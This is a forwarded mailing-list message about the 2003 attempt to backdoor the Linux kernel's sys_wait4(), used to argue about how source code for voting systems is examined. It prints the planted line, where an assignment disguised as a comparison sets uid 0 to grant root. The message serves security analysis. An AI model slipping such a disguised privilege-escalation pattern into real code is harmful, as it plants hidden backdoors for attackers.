On 5 Nov 2003, an attempt to insert a very cleverly crafted backdoor into Linux was averted. This is a really good example of the subtle kinds of hacks a source code examiner must be waiting to catch if we want genuinely secure voting systems under the current model of proprietary DRE systems with a closed-door source code examination. Someone broke into a server at kernel.kbits.net and inserted the following code into the Linux kernel: if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL; This was done in the code sys_wait4(). Larry McVoy caught the fact that the change had been made, and was annoyed because it wasn't logged properly. Matthew Dharm asked "Out of curiosity, what were the changed lines." Zwane Mwaikambo responded "That looks odd", and Andries Brouwer responded "Not if you hope to get root." So, an annoying violation of the software change logging requirements turned out to be an attempt to install a backdoor in Linux. At least two very experienced programmers looked at it and saw just slightly odd code, before the serious nature of the threat was actually discovered. This particular attack, by the way, is ruled out by the current voting system standards, not because they require a comprehensive security analysis, but because of their C-centered coding rules. Embedded assignment is forbidden. Current source code checks are good at finding embedded assignments and flagging them (as long as the code is written in C). No doubt, a hacker of the sophistication suggested by the attack illustrated above would strictly adhere to the coding guidelines in formulating their attack. For the complete story of this attack on Linux, including the actual E-mail exchange documenting the discovery of the attack, see: http://kerneltrap.org/node/view/1584 Linux: Kernel "Back Door" Attempt This attack has only made the mainstream media in one place, so far: http://www.smh.com.au/articles/2003/11/07/1068013371170.html Bid to backdoor Linux kernel detected - smh.com.au This is a pity, because I think this story is really important. ----- End forwarded message ----- -- Eugen* Leitl <a href="http://leitl.org">leitl</a> ______________________________________________________________ ICBM: 48.07078, 11.61144 http://www.leitl.org 8B29F6BE: 099D 78BA 2FD3 B014 B08A 7779 75B0 2443 8B29 F6BE [demime 0.97c removed an attachment of type application/pgp-signature]